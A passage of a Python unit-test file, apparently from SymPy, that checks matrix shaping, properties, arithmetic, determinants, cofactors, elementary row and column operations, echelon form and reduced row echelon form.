def test_vstack():
m = ShapingOnlyMatrix(4, 3, lambda i, j: i*3 + j)
m2 = ShapingOnlyMatrix(3, 4, lambda i, j: i*3 + j)
assert m == m.vstack(m)
assert m.vstack(m, m, m) == ShapingOnlyMatrix.vstack(m, m, m) == Matrix([
[0, 1, 2],
[3, 4, 5],
[6, 7, 8],
[9, 10, 11],
[0, 1, 2],
[3, 4, 5],
[6, 7, 8],
[9, 10, 11],
[0, 1, 2],
[3, 4, 5],
[6, 7, 8],
[9, 10, 11]])
raises(ShapeError, lambda: m.vstack(m, m2))
assert Matrix.vstack() == Matrix()
# PropertiesOnlyMatrix tests
def test_atoms():
m = PropertiesOnlyMatrix(2, 2, [1, 2, x, 1 - 1/x])
assert m.atoms() == {S(1),S(2),S(-1), x}
assert m.atoms(Symbol) == {x}
def test_free_symbols():
assert PropertiesOnlyMatrix([[x], [0]]).free_symbols == {x}
def test_has():
A = PropertiesOnlyMatrix(((x, y), (2, 3)))
assert A.has(x)
assert not A.has(z)
assert A.has(Symbol)
A = PropertiesOnlyMatrix(((2, y), (2, 3)))
assert not A.has(x)
def test_is_anti_symmetric():
x = symbols('x')
assert PropertiesOnlyMatrix(2, 1, [1, 2]).is_anti_symmetric() is False
m = PropertiesOnlyMatrix(3, 3, [0, x**2 + 2*x + 1, y, -(x + 1)**2, 0, x*y, -y, -x*y, 0])
assert m.is_anti_symmetric() is True
assert m.is_anti_symmetric(simplify=False) is False
assert m.is_anti_symmetric(simplify=lambda x: x) is False
m = PropertiesOnlyMatrix(3, 3, [x.expand() for x in m])
assert m.is_anti_symmetric(simplify=False) is True
m = PropertiesOnlyMatrix(3, 3, [x.expand() for x in [S.One] + list(m)[1:]])
assert m.is_anti_symmetric() is False
def test_diagonal_symmetrical():
m = PropertiesOnlyMatrix(2, 2, [0, 1, 1, 0])
assert not m.is_diagonal()
assert m.is_symmetric()
assert m.is_symmetric(simplify=False)
m = PropertiesOnlyMatrix(2, 2, [1, 0, 0, 1])
assert m.is_diagonal()
m = PropertiesOnlyMatrix(3, 3, diag(1, 2, 3))
assert m.is_diagonal()
assert m.is_symmetric()
m = PropertiesOnlyMatrix(3, 3, [1, 0, 0, 0, 2, 0, 0, 0, 3])
assert m == diag(1, 2, 3)
m = PropertiesOnlyMatrix(2, 3, zeros(2, 3))
assert not m.is_symmetric()
assert m.is_diagonal()
m = PropertiesOnlyMatrix(((5, 0), (0, 6), (0, 0)))
assert m.is_diagonal()
m = PropertiesOnlyMatrix(((5, 0, 0), (0, 6, 0)))
assert m.is_diagonal()
m = Matrix(3, 3, [1, x**2 + 2*x + 1, y, (x + 1)**2, 2, 0, y, 0, 3])
assert m.is_symmetric()
assert not m.is_symmetric(simplify=False)
assert m.expand().is_symmetric(simplify=False)
def test_is_hermitian():
a = PropertiesOnlyMatrix([[1, I], [-I, 1]])
assert a.is_hermitian
a = PropertiesOnlyMatrix([[2*I, I], [-I, 1]])
assert a.is_hermitian is False
a = PropertiesOnlyMatrix([[x, I], [-I, 1]])
assert a.is_hermitian is None
a = PropertiesOnlyMatrix([[x, 1], [-I, 1]])
assert a.is_hermitian is False
def test_is_Identity():
assert eye_Properties(3).is_Identity
assert not PropertiesOnlyMatrix(zeros(3)).is_Identity
assert not PropertiesOnlyMatrix(ones(3)).is_Identity
# issue 6242
assert not PropertiesOnlyMatrix([[1, 0, 0]]).is_Identity
def test_is_symbolic():
a = PropertiesOnlyMatrix([[x, x], [x, x]])
assert a.is_symbolic() is True
a = PropertiesOnlyMatrix([[1, 2, 3, 4], [5, 6, 7, 8]])
assert a.is_symbolic() is False
a = PropertiesOnlyMatrix([[1, 2, 3, 4], [5, 6, x, 8]])
assert a.is_symbolic() is True
a = PropertiesOnlyMatrix([[1, x, 3]])
assert a.is_symbolic() is True
a = PropertiesOnlyMatrix([[1, 2, 3]])
assert a.is_symbolic() is False
a = PropertiesOnlyMatrix([[1], [x], [3]])
assert a.is_symbolic() is True
a = PropertiesOnlyMatrix([[1], [2], [3]])
assert a.is_symbolic() is False
def test_is_upper():
a = PropertiesOnlyMatrix([[1, 2, 3]])
assert a.is_upper is True
a = PropertiesOnlyMatrix([[1], [2], [3]])
assert a.is_upper is False
def test_is_lower():
a = PropertiesOnlyMatrix([[1, 2, 3]])
assert a.is_lower is False
a = PropertiesOnlyMatrix([[1], [2], [3]])
assert a.is_lower is True
def test_is_square():
m = PropertiesOnlyMatrix([[1],[1]])
m2 = PropertiesOnlyMatrix([[2,2],[2,2]])
assert not m.is_square
assert m2.is_square
def test_is_symmetric():
m = PropertiesOnlyMatrix(2, 2, [0, 1, 1, 0])
assert m.is_symmetric()
m = PropertiesOnlyMatrix(2, 2, [0, 1, 0, 1])
assert not m.is_symmetric()
def test_is_hessenberg():
A = PropertiesOnlyMatrix([[3, 4, 1], [2, 4, 5], [0, 1, 2]])
assert A.is_upper_hessenberg
A = PropertiesOnlyMatrix(3, 3, [3, 2, 0, 4, 4, 1, 1, 5, 2])
assert A.is_lower_hessenberg
A = PropertiesOnlyMatrix(3, 3, [3, 2, -1, 4, 4, 1, 1, 5, 2])
assert A.is_lower_hessenberg is False
assert A.is_upper_hessenberg is False
A = PropertiesOnlyMatrix([[3, 4, 1], [2, 4, 5], [3, 1, 2]])
assert not A.is_upper_hessenberg
def test_is_zero():
assert PropertiesOnlyMatrix(0, 0, []).is_zero
assert PropertiesOnlyMatrix([[0, 0], [0, 0]]).is_zero
assert PropertiesOnlyMatrix(zeros(3, 4)).is_zero
assert not PropertiesOnlyMatrix(eye(3)).is_zero
assert PropertiesOnlyMatrix([[x, 0], [0, 0]]).is_zero == None
assert PropertiesOnlyMatrix([[x, 1], [0, 0]]).is_zero == False
a = Symbol('a', nonzero=True)
assert PropertiesOnlyMatrix([[a, 0], [0, 0]]).is_zero == False
def test_values():
assert set(PropertiesOnlyMatrix(2,2,[0,1,2,3]).values()) == set([1,2,3])
x = Symbol('x', real=True)
assert set(PropertiesOnlyMatrix(2,2,[x,0,0,1]).values()) == set([x,1])
# OperationsOnlyMatrix tests
def test_applyfunc():
m0 = OperationsOnlyMatrix(eye(3))
assert m0.applyfunc(lambda x: 2*x) == eye(3)*2
assert m0.applyfunc(lambda x: 0) == zeros(3)
assert m0.applyfunc(lambda x: 1) == ones(3)
def test_adjoint():
dat = [[0, I], [1, 0]]
ans = OperationsOnlyMatrix([[0, 1], [-I, 0]])
assert ans.adjoint() == Matrix(dat)
def test_as_real_imag():
m1 = OperationsOnlyMatrix(2,2,[1,2,3,4])
m3 = OperationsOnlyMatrix(2,2,[1+S.ImaginaryUnit,2+2*S.ImaginaryUnit,3+3*S.ImaginaryUnit,4+4*S.ImaginaryUnit])
a,b = m3.as_real_imag()
assert a == m1
assert b == m1
def test_conjugate():
M = OperationsOnlyMatrix([[0, I, 5],
[1, 2, 0]])
assert M.T == Matrix([[0, 1],
[I, 2],
[5, 0]])
assert M.C == Matrix([[0, -I, 5],
[1, 2, 0]])
assert M.C == M.conjugate()
assert M.H == M.T.C
assert M.H == Matrix([[ 0, 1],
[-I, 2],
[ 5, 0]])
def test_doit():
a = OperationsOnlyMatrix([[Add(x,x, evaluate=False)]])
assert a[0] != 2*x
assert a.doit() == Matrix([[2*x]])
def test_evalf():
a = OperationsOnlyMatrix(2, 1, [sqrt(5), 6])
assert all(a.evalf()[i] == a[i].evalf() for i in range(2))
assert all(a.evalf(2)[i] == a[i].evalf(2) for i in range(2))
assert all(a.n(2)[i] == a[i].n(2) for i in range(2))
def test_expand():
m0 = OperationsOnlyMatrix([[x*(x + y), 2], [((x + y)*y)*x, x*(y + x*(x + y))]])
# Test if expand() returns a matrix
m1 = m0.expand()
assert m1 == Matrix(
[[x*y + x**2, 2], [x*y**2 + y*x**2, x*y + y*x**2 + x**3]])
a = Symbol('a', real=True)
assert OperationsOnlyMatrix(1, 1, [exp(I*a)]).expand(complex=True) == \
Matrix([cos(a) + I*sin(a)])
def test_refine():
m0 = OperationsOnlyMatrix([[Abs(x)**2, sqrt(x**2)],
[sqrt(x**2)*Abs(y)**2, sqrt(y**2)*Abs(x)**2]])
m1 = m0.refine(Q.real(x) & Q.real(y))
assert m1 == Matrix([[x**2, Abs(x)], [y**2*Abs(x), x**2*Abs(y)]])
m1 = m0.refine(Q.positive(x) & Q.positive(y))
assert m1 == Matrix([[x**2, x], [x*y**2, x**2*y]])
m1 = m0.refine(Q.negative(x) & Q.negative(y))
assert m1 == Matrix([[x**2, -x], [-x*y**2, -x**2*y]])
def test_replace():
F, G = symbols('F, G', cls=Function)
K = OperationsOnlyMatrix(2, 2, lambda i, j: G(i+j))
M = OperationsOnlyMatrix(2, 2, lambda i, j: F(i+j))
N = M.replace(F, G)
assert N == K
def test_replace_map():
F, G = symbols('F, G', cls=Function)
K = OperationsOnlyMatrix(2, 2, [(G(0), {F(0): G(0)}), (G(1), {F(1): G(1)}), (G(1), {F(1) \
: G(1)}), (G(2), {F(2): G(2)})])
M = OperationsOnlyMatrix(2, 2, lambda i, j: F(i+j))
N = M.replace(F, G, True)
assert N == K
def test_simplify():
n = Symbol('n')
f = Function('f')
M = OperationsOnlyMatrix([[ 1/x + 1/y, (x + x*y) / x ],
[ (f(x) + y*f(x))/f(x), 2 * (1/n - cos(n * pi)/n) / pi ]])
assert M.simplify() == Matrix([[ (x + y)/(x * y), 1 + y ],
[ 1 + y, 2*((1 - 1*cos(pi*n))/(pi*n)) ]])
eq = (1 + x)**2
M = OperationsOnlyMatrix([[eq]])
assert M.simplify() == Matrix([[eq]])
assert M.simplify(ratio=oo) == Matrix([[eq.simplify(ratio=oo)]])
def test_subs():
assert OperationsOnlyMatrix([[1, x], [x, 4]]).subs(x, 5) == Matrix([[1, 5], [5, 4]])
assert OperationsOnlyMatrix([[x, 2], [x + y, 4]]).subs([[x, -1], [y, -2]]) == \
Matrix([[-1, 2], [-3, 4]])
assert OperationsOnlyMatrix([[x, 2], [x + y, 4]]).subs([(x, -1), (y, -2)]) == \
Matrix([[-1, 2], [-3, 4]])
assert OperationsOnlyMatrix([[x, 2], [x + y, 4]]).subs({x: -1, y: -2}) == \
Matrix([[-1, 2], [-3, 4]])
assert OperationsOnlyMatrix([[x*y]]).subs({x: y - 1, y: x - 1}, simultaneous=True) == \
Matrix([[(x - 1)*(y - 1)]])
def test_trace():
M = OperationsOnlyMatrix([[1, 0, 0],
[0, 5, 0],
[0, 0, 8]])
assert M.trace() == 14
def test_xreplace():
assert OperationsOnlyMatrix([[1, x], [x, 4]]).xreplace({x: 5}) == \
Matrix([[1, 5], [5, 4]])
assert OperationsOnlyMatrix([[x, 2], [x + y, 4]]).xreplace({x: -1, y: -2}) == \
Matrix([[-1, 2], [-3, 4]])
def test_permute():
a = OperationsOnlyMatrix(3, 4, [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])
raises(IndexError, lambda: a.permute([[0,5]]))
b = a.permute_rows([[0, 2], [0, 1]])
assert a.permute([[0, 2], [0, 1]]) == b == Matrix([
[5, 6, 7, 8],
[9, 10, 11, 12],
[1, 2, 3, 4]])
b = a.permute_cols([[0, 2], [0, 1]])
assert a.permute([[0, 2], [0, 1]], orientation='cols') == b ==\
Matrix([
[ 2, 3, 1, 4],
[ 6, 7, 5, 8],
[10, 11, 9, 12]])
b = a.permute_cols([[0, 2], [0, 1]], direction='backward')
assert a.permute([[0, 2], [0, 1]], orientation='cols', direction='backward') == b ==\
Matrix([
[ 3, 1, 2, 4],
[ 7, 5, 6, 8],
[11, 9, 10, 12]])
assert a.permute([1, 2, 0, 3]) == Matrix([
[5, 6, 7, 8],
[9, 10, 11, 12],
[1, 2, 3, 4]])
from sympy.combinatorics import Permutation
assert a.permute(Permutation([1, 2, 0, 3])) == Matrix([
[5, 6, 7, 8],
[9, 10, 11, 12],
[1, 2, 3, 4]])
# ArithmeticOnlyMatrix tests
def test_abs():
m = ArithmeticOnlyMatrix([[1, -2], [x, y]])
assert abs(m) == ArithmeticOnlyMatrix([[1, 2], [Abs(x), Abs(y)]])
def test_add():
m = ArithmeticOnlyMatrix([[1, 2, 3], [x, y, x], [2*y, -50, z*x]])
assert m + m == ArithmeticOnlyMatrix([[2, 4, 6], [2*x, 2*y, 2*x], [4*y, -100, 2*z*x]])
n = ArithmeticOnlyMatrix(1, 2, [1, 2])
raises(ShapeError, lambda: m + n)
def test_multiplication():
a = ArithmeticOnlyMatrix((
(1, 2),
(3, 1),
(0, 6),
))
b = ArithmeticOnlyMatrix((
(1, 2),
(3, 0),
))
raises(ShapeError, lambda: b*a)
raises(TypeError, lambda: a*{})
c = a*b
assert c[0, 0] == 7
assert c[0, 1] == 2
assert c[1, 0] == 6
assert c[1, 1] == 6
assert c[2, 0] == 18
assert c[2, 1] == 0
try:
eval('c = a @ b')
except SyntaxError:
pass
else:
assert c[0, 0] == 7
assert c[0, 1] == 2
assert c[1, 0] == 6
assert c[1, 1] == 6
assert c[2, 0] == 18
assert c[2, 1] == 0
h = a.multiply_elementwise(c)
assert h == matrix_multiply_elementwise(a, c)
assert h[0, 0] == 7
assert h[0, 1] == 4
assert h[1, 0] == 18
assert h[1, 1] == 6
assert h[2, 0] == 0
assert h[2, 1] == 0
raises(ShapeError, lambda: a.multiply_elementwise(b))
c = b * Symbol("x")
assert isinstance(c, ArithmeticOnlyMatrix)
assert c[0, 0] == x
assert c[0, 1] == 2*x
assert c[1, 0] == 3*x
assert c[1, 1] == 0
c2 = x * b
assert c == c2
c = 5 * b
assert isinstance(c, ArithmeticOnlyMatrix)
assert c[0, 0] == 5
assert c[0, 1] == 2*5
assert c[1, 0] == 3*5
assert c[1, 1] == 0
try:
eval('c = 5 @ b')
except SyntaxError:
pass
else:
assert isinstance(c, ArithmeticOnlyMatrix)
assert c[0, 0] == 5
assert c[0, 1] == 2*5
assert c[1, 0] == 3*5
assert c[1, 1] == 0
def test_matmul():
a = Matrix([[1, 2], [3, 4]])
assert a.__matmul__(2) == NotImplemented
assert a.__rmatmul__(2) == NotImplemented
#This is done this way because @ is only supported in Python 3.5+
#To check 2@a case
try:
eval('2 @ a')
except SyntaxError:
pass
except TypeError: #TypeError is raised in case of NotImplemented is returned
pass
#Check a@2 case
try:
eval('a @ 2')
except SyntaxError:
pass
except TypeError: #TypeError is raised in case of NotImplemented is returned
pass
def test_power():
raises(NonSquareMatrixError, lambda: Matrix((1, 2))**2)
A = ArithmeticOnlyMatrix([[2, 3], [4, 5]])
assert (A**5)[:] == (6140, 8097, 10796, 14237)
A = ArithmeticOnlyMatrix([[2, 1, 3], [4, 2, 4], [6, 12, 1]])
assert (A**3)[:] == (290, 262, 251, 448, 440, 368, 702, 954, 433)
assert A**0 == eye(3)
assert A**1 == A
assert (ArithmeticOnlyMatrix([[2]]) ** 100)[0, 0] == 2**100
assert ArithmeticOnlyMatrix([[1, 2], [3, 4]])**Integer(2) == ArithmeticOnlyMatrix([[7, 10], [15, 22]])
def test_neg():
n = ArithmeticOnlyMatrix(1, 2, [1, 2])
assert -n == ArithmeticOnlyMatrix(1, 2, [-1, -2])
def test_sub():
n = ArithmeticOnlyMatrix(1, 2, [1, 2])
assert n - n == ArithmeticOnlyMatrix(1, 2, [0, 0])
def test_div():
n = ArithmeticOnlyMatrix(1, 2, [1, 2])
assert n/2 == ArithmeticOnlyMatrix(1, 2, [S(1)/2, S(2)/2])
# DeterminantOnlyMatrix tests
def test_det():
a = DeterminantOnlyMatrix(2,3,[1,2,3,4,5,6])
raises(NonSquareMatrixError, lambda: a.det())
z = zeros_Determinant(2)
ey = eye_Determinant(2)
assert z.det() == 0
assert ey.det() == 1
x = Symbol('x')
a = DeterminantOnlyMatrix(0,0,[])
b = DeterminantOnlyMatrix(1,1,[5])
c = DeterminantOnlyMatrix(2,2,[1,2,3,4])
d = DeterminantOnlyMatrix(3,3,[1,2,3,4,5,6,7,8,8])
e = DeterminantOnlyMatrix(4,4,[x,1,2,3,4,5,6,7,2,9,10,11,12,13,14,14])
# the method keyword for `det` doesn't kick in until 4x4 matrices,
# so there is no need to test all methods on smaller ones
assert a.det() == 1
assert b.det() == 5
assert c.det() == -2
assert d.det() == 3
assert e.det() == 4*x - 24
assert e.det(method='bareiss') == 4*x - 24
assert e.det(method='berkowitz') == 4*x - 24
raises(ValueError, lambda: e.det(iszerofunc="test"))
def test_adjugate():
x = Symbol('x')
e = DeterminantOnlyMatrix(4,4,[x,1,2,3,4,5,6,7,2,9,10,11,12,13,14,14])
adj = Matrix([
[ 4, -8, 4, 0],
[ 76, -14*x - 68, 14*x - 8, -4*x + 24],
[-122, 17*x + 142, -21*x + 4, 8*x - 48],
[ 48, -4*x - 72, 8*x, -4*x + 24]])
assert e.adjugate() == adj
assert e.adjugate(method='bareiss') == adj
assert e.adjugate(method='berkowitz') == adj
a = DeterminantOnlyMatrix(2,3,[1,2,3,4,5,6])
raises(NonSquareMatrixError, lambda: a.adjugate())
def test_cofactor_and_minors():
x = Symbol('x')
e = DeterminantOnlyMatrix(4,4,[x,1,2,3,4,5,6,7,2,9,10,11,12,13,14,14])
m = Matrix([
[ x, 1, 3],
[ 2, 9, 11],
[12, 13, 14]])
cm = Matrix([
[ 4, 76, -122, 48],
[-8, -14*x - 68, 17*x + 142, -4*x - 72],
[ 4, 14*x - 8, -21*x + 4, 8*x],
[ 0, -4*x + 24, 8*x - 48, -4*x + 24]])
sub = Matrix([
[x, 1, 2],
[4, 5, 6],
[2, 9, 10]])
assert e.minor_submatrix(1,2) == m
assert e.minor_submatrix(-1,-1) == sub
assert e.minor(1,2) == -17*x - 142
assert e.cofactor(1,2) == 17*x + 142
assert e.cofactor_matrix() == cm
assert e.cofactor_matrix(method="bareiss") == cm
assert e.cofactor_matrix(method="berkowitz") == cm
raises(ValueError, lambda: e.cofactor(4,5))
raises(ValueError, lambda: e.minor(4,5))
raises(ValueError, lambda: e.minor_submatrix(4,5))
a = DeterminantOnlyMatrix(2,3,[1,2,3,4,5,6])
assert a.minor_submatrix(0,0) == Matrix([[5, 6]])
raises(ValueError, lambda: DeterminantOnlyMatrix(0,0,[]).minor_submatrix(0,0))
raises(NonSquareMatrixError, lambda: a.cofactor(0,0))
raises(NonSquareMatrixError, lambda: a.minor(0,0))
raises(NonSquareMatrixError, lambda: a.cofactor_matrix())
def test_charpoly():
x, y = Symbol('x'), Symbol('y')
m = DeterminantOnlyMatrix(3,3,[1,2,3,4,5,6,7,8,9])
assert eye_Determinant(3).charpoly(x) == Poly((x - 1)**3, x)
assert eye_Determinant(3).charpoly(y) == Poly((y - 1)**3, y)
assert m.charpoly() == Poly(x**3 - 15*x**2 - 18*x, x)
raises(NonSquareMatrixError, lambda: Matrix([[1], [2]]).charpoly())
# ReductionsOnlyMatrix tests
def test_row_op():
e = eye_Reductions(3)
raises(ValueError, lambda: e.elementary_row_op("abc"))
raises(ValueError, lambda: e.elementary_row_op())
raises(ValueError, lambda: e.elementary_row_op('n->kn', row=5, k=5))
raises(ValueError, lambda: e.elementary_row_op('n->kn', row=-5, k=5))
raises(ValueError, lambda: e.elementary_row_op('n<->m', row1=1, row2=5))
raises(ValueError, lambda: e.elementary_row_op('n<->m', row1=5, row2=1))
raises(ValueError, lambda: e.elementary_row_op('n<->m', row1=-5, row2=1))
raises(ValueError, lambda: e.elementary_row_op('n<->m', row1=1, row2=-5))
raises(ValueError, lambda: e.elementary_row_op('n->n+km', row1=1, row2=5, k=5))
raises(ValueError, lambda: e.elementary_row_op('n->n+km', row1=5, row2=1, k=5))
raises(ValueError, lambda: e.elementary_row_op('n->n+km', row1=-5, row2=1, k=5))
raises(ValueError, lambda: e.elementary_row_op('n->n+km', row1=1, row2=-5, k=5))
raises(ValueError, lambda: e.elementary_row_op('n->n+km', row1=1, row2=1, k=5))
# test various ways to set arguments
assert e.elementary_row_op("n->kn", 0, 5) == Matrix([[5, 0, 0], [0, 1, 0], [0, 0, 1]])
assert e.elementary_row_op("n->kn", 1, 5) == Matrix([[1, 0, 0], [0, 5, 0], [0, 0, 1]])
assert e.elementary_row_op("n->kn", row=1, k=5) == Matrix([[1, 0, 0], [0, 5, 0], [0, 0, 1]])
assert e.elementary_row_op("n->kn", row1=1, k=5) == Matrix([[1, 0, 0], [0, 5, 0], [0, 0, 1]])
assert e.elementary_row_op("n<->m", 0, 1) == Matrix([[0, 1, 0], [1, 0, 0], [0, 0, 1]])
assert e.elementary_row_op("n<->m", row1=0, row2=1) == Matrix([[0, 1, 0], [1, 0, 0], [0, 0, 1]])
assert e.elementary_row_op("n<->m", row=0, row2=1) == Matrix([[0, 1, 0], [1, 0, 0], [0, 0, 1]])
assert e.elementary_row_op("n->n+km", 0, 5, 1) == Matrix([[1, 5, 0], [0, 1, 0], [0, 0, 1]])
assert e.elementary_row_op("n->n+km", row=0, k=5, row2=1) == Matrix([[1, 5, 0], [0, 1, 0], [0, 0, 1]])
assert e.elementary_row_op("n->n+km", row1=0, k=5, row2=1) == Matrix([[1, 5, 0], [0, 1, 0], [0, 0, 1]])
# make sure the matrix doesn't change size
a = ReductionsOnlyMatrix(2, 3, [0]*6)
assert a.elementary_row_op("n->kn", 1, 5) == Matrix(2, 3, [0]*6)
assert a.elementary_row_op("n<->m", 0, 1) == Matrix(2, 3, [0]*6)
assert a.elementary_row_op("n->n+km", 0, 5, 1) == Matrix(2, 3, [0]*6)
def test_col_op():
e = eye_Reductions(3)
raises(ValueError, lambda: e.elementary_col_op("abc"))
raises(ValueError, lambda: e.elementary_col_op())
raises(ValueError, lambda: e.elementary_col_op('n->kn', col=5, k=5))
raises(ValueError, lambda: e.elementary_col_op('n->kn', col=-5, k=5))
raises(ValueError, lambda: e.elementary_col_op('n<->m', col1=1, col2=5))
raises(ValueError, lambda: e.elementary_col_op('n<->m', col1=5, col2=1))
raises(ValueError, lambda: e.elementary_col_op('n<->m', col1=-5, col2=1))
raises(ValueError, lambda: e.elementary_col_op('n<->m', col1=1, col2=-5))
raises(ValueError, lambda: e.elementary_col_op('n->n+km', col1=1, col2=5, k=5))
raises(ValueError, lambda: e.elementary_col_op('n->n+km', col1=5, col2=1, k=5))
raises(ValueError, lambda: e.elementary_col_op('n->n+km', col1=-5, col2=1, k=5))
raises(ValueError, lambda: e.elementary_col_op('n->n+km', col1=1, col2=-5, k=5))
raises(ValueError, lambda: e.elementary_col_op('n->n+km', col1=1, col2=1, k=5))
# test various ways to set arguments
assert e.elementary_col_op("n->kn", 0, 5) == Matrix([[5, 0, 0], [0, 1, 0], [0, 0, 1]])
assert e.elementary_col_op("n->kn", 1, 5) == Matrix([[1, 0, 0], [0, 5, 0], [0, 0, 1]])
assert e.elementary_col_op("n->kn", col=1, k=5) == Matrix([[1, 0, 0], [0, 5, 0], [0, 0, 1]])
assert e.elementary_col_op("n->kn", col1=1, k=5) == Matrix([[1, 0, 0], [0, 5, 0], [0, 0, 1]])
assert e.elementary_col_op("n<->m", 0, 1) == Matrix([[0, 1, 0], [1, 0, 0], [0, 0, 1]])
assert e.elementary_col_op("n<->m", col1=0, col2=1) == Matrix([[0, 1, 0], [1, 0, 0], [0, 0, 1]])
assert e.elementary_col_op("n<->m", col=0, col2=1) == Matrix([[0, 1, 0], [1, 0, 0], [0, 0, 1]])
assert e.elementary_col_op("n->n+km", 0, 5, 1) == Matrix([[1, 0, 0], [5, 1, 0], [0, 0, 1]])
assert e.elementary_col_op("n->n+km", col=0, k=5, col2=1) == Matrix([[1, 0, 0], [5, 1, 0], [0, 0, 1]])
assert e.elementary_col_op("n->n+km", col1=0, k=5, col2=1) == Matrix([[1, 0, 0], [5, 1, 0], [0, 0, 1]])
# make sure the matrix doesn't change size
a = ReductionsOnlyMatrix(2, 3, [0]*6)
assert a.elementary_col_op("n->kn", 1, 5) == Matrix(2, 3, [0]*6)
assert a.elementary_col_op("n<->m", 0, 1) == Matrix(2, 3, [0]*6)
assert a.elementary_col_op("n->n+km", 0, 5, 1) == Matrix(2, 3, [0]*6)
def test_is_echelon():
zro = zeros_Reductions(3)
ident = eye_Reductions(3)
assert zro.is_echelon
assert ident.is_echelon
a = ReductionsOnlyMatrix(0, 0, [])
assert a.is_echelon
a = ReductionsOnlyMatrix(2, 3, [3, 2, 1, 0, 0, 6])
assert a.is_echelon
a = ReductionsOnlyMatrix(2, 3, [0, 0, 6, 3, 2, 1])
assert not a.is_echelon
x = Symbol('x')
a = ReductionsOnlyMatrix(3, 1, [x, 0, 0])
assert a.is_echelon
a = ReductionsOnlyMatrix(3, 1, [x, x, 0])
assert not a.is_echelon
a = ReductionsOnlyMatrix(3, 3, [0, 0, 0, 1, 2, 3, 0, 0, 0])
assert not a.is_echelon
def test_echelon_form():
# echelon form is not unique, but the result
# must be row-equivalent to the original matrix
# and it must be in echelon form.
a = zeros_Reductions(3)
e = eye_Reductions(3)
# we can assume the zero matrix and the identity matrix shouldn't change
assert a.echelon_form() == a
assert e.echelon_form() == e
a = ReductionsOnlyMatrix(0, 0, [])
assert a.echelon_form() == a
a = ReductionsOnlyMatrix(1, 1, [5])
assert a.echelon_form() == a
# now we get to the real tests
def verify_row_null_space(mat, rows, nulls):
for v in nulls:
assert all(t.is_zero for t in a_echelon*v)
for v in rows:
if not all(t.is_zero for t in v):
assert not all(t.is_zero for t in a_echelon*v.transpose())
a = ReductionsOnlyMatrix(3, 3, [1, 2, 3, 4, 5, 6, 7, 8, 9])
nulls = [Matrix([
[ 1],
[-2],
[ 1]])]
rows = [a[i,:] for i in range(a.rows)]
a_echelon = a.echelon_form()
assert a_echelon.is_echelon
verify_row_null_space(a, rows, nulls)
a = ReductionsOnlyMatrix(3, 3, [1, 2, 3, 4, 5, 6, 7, 8, 8])
nulls = []
rows = [a[i,:] for i in range(a.rows)]
a_echelon = a.echelon_form()
assert a_echelon.is_echelon
verify_row_null_space(a, rows, nulls)
a = ReductionsOnlyMatrix(3, 3, [2, 1, 3, 0, 0, 0, 2, 1, 3])
nulls = [Matrix([
[-S(1)/2],
[ 1],
[ 0]]),
Matrix([
[-S(3)/2],
[ 0],
[ 1]])]
rows = [a[i,:] for i in range(a.rows)]
a_echelon = a.echelon_form()
assert a_echelon.is_echelon
verify_row_null_space(a, rows, nulls)
# this one requires a row swap
a = ReductionsOnlyMatrix(3, 3, [2, 1, 3, 0, 0, 0, 1, 1, 3])
nulls = [Matrix([
[ 0],
[ -3],
[ 1]])]
rows = [a[i,:] for i in range(a.rows)]
a_echelon = a.echelon_form()
assert a_echelon.is_echelon
verify_row_null_space(a, rows, nulls)
a = ReductionsOnlyMatrix(3, 3, [0, 3, 3, 0, 2, 2, 0, 1, 1])
nulls = [Matrix([
[1],
[0],
[0]]),
Matrix([
[ 0],
[-1],
[ 1]])]
rows = [a[i,:] for i in range(a.rows)]
a_echelon = a.echelon_form()
assert a_echelon.is_echelon
verify_row_null_space(a, rows, nulls)
a = ReductionsOnlyMatrix(2, 3, [2, 2, 3, 3, 3, 0])
nulls = [Matrix([
[-1],
[1],
[0]])]
rows = [a[i,:] for i in range(a.rows)]
a_echelon = a.echelon_form()
assert a_echelon.is_echelon
verify_row_null_space(a, rows, nulls)
def test_rref():
e = ReductionsOnlyMatrix(0, 0, [])
assert e.rref(pivots=False) == e
e = ReductionsOnlyMatrix(1, 1, [1])
a = ReductionsOnlyMatrix(1, 1, [5])
assert e.rref(pivots=False) == a.rref(pivots=False) == e
a = ReductionsOnlyMatrix(3, 1, [1, 2, 3])
assert a.rref(pivots=False) == Matrix([[1], [0], [0]])
a = ReductionsOnlyMatrix(1, 3, [1, 2, 3])
assert a.rref(pivots=False) == Matrix([[1, 2, 3]])
a = ReductionsOnlyMatrix(3, 3, [1, 2, 3, 4, 5, 6, 7, 8, 9])
assert a.rref(pivots=False) == Matrix([
[1, 0, -1],
[0, 1, 2],
[0, 0, 0]])
a = ReductionsOnlyMatrix(3, 3, [1, 2, 3, 1, 2, 3, 1, 2, 3])
b = ReductionsOnlyMatrix(3, 3, [1, 2, 3, 0, 0, 0, 0, 0, 0])
c = ReductionsOnlyMatrix(3, 3, [0, 0, 0, 1, 2, 3, 0, 0, 0])
d = ReductionsOnlyMatrix(3, 3, [0, 0, 0, 0, 0, 0, 1, 2, 3])
assert a.rref(pivots=False) == \
b.rref(pivots=False) == \
c.rref(pivots=False) == \
d.rref(pivots=False) == b
e = eye_Reductions(3)
z = zeros_Reductions(3)
assert e.rref(pivots=False) == e
assert z.rref(pivots=False) == z
a = ReductionsOnlyMatrix([
[ 0, 0, 1, 2, 2, -5, 3],
[-1, 5, 2, 2, 1, -7, 5],
[ 0, 0, -2, -3, -3, 8, -5],
[-1, 5, 0, -1, -2, 1, 0]])
mat, pivot_offsets = a.rref()
assert mat == Matrix([
[1, -5, 0, 0, 1, 1, -1],
[0, 0, 1, 0, 0, -1, 1],
[0, 0, 0, 1, 1, -2, 1],
[0, 0, 0, 0, 0, 0, 0]])
assert pivot_offsets == (0, 2, 3)
a = ReductionsOnlyMatrix([[S(1)/19, S(1)/5, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[ 12, 13, 14, 15]])
assert a.rref(pivots=False) == Matrix([
[1, 0, 0, -S(76)/157],
[0, 1, 0, -S(5)/157],
[0, 0, 1, S(238)/157],
[0, 0, 0, 0]])
x = Symbol('x')
a = ReductionsOnlyMatrix(2, 3, [x, 1, 1, sqrt(x), x, 1])
for i, j in zip(a.rref(pivots=False),
[1, 0, sqrt(x)*(-x + 1)/(-x**(S(5)/2) + x),
0, 1, 1/(sqrt(x) + x + 1)]):
assert simplify(i - j).is_zero
# SpecialOnlyMatrix tests
def test_eye():
assert list(SpecialOnlyMatrix.eye(2,2)) == [1, 0, 0, 1]
assert list(SpecialOnlyMatrix.eye(2)) == [1, 0, 0, 1]
assert type(SpecialOnlyMatrix.eye(2)) == SpecialOnlyMatrix
